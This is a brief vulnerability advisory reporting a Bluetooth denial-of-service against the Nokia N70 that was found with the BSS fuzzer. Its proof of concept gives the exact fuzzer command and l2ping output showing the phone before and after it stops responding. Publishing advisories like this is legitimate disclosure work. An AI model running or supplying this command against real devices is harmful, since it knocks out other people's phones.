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[ Secuobs - Advisory ] Bluetooth : DoS on Nokia cell phones

[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Denial of Service on Bluetooth Stack (maybe more) - Message "System 
Error" - Phone DoS (shutdown)

[Credits] Pierre Betouin - pierre.betouin@xxxxxxxxxxxx -  Bug found with BSS 
v0.6 GPL fuzzer (Bluetooh Stack Smasher - Linux) 

BSS could be downloaded on  

[Vendor] notified now

[Original advisory]


[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss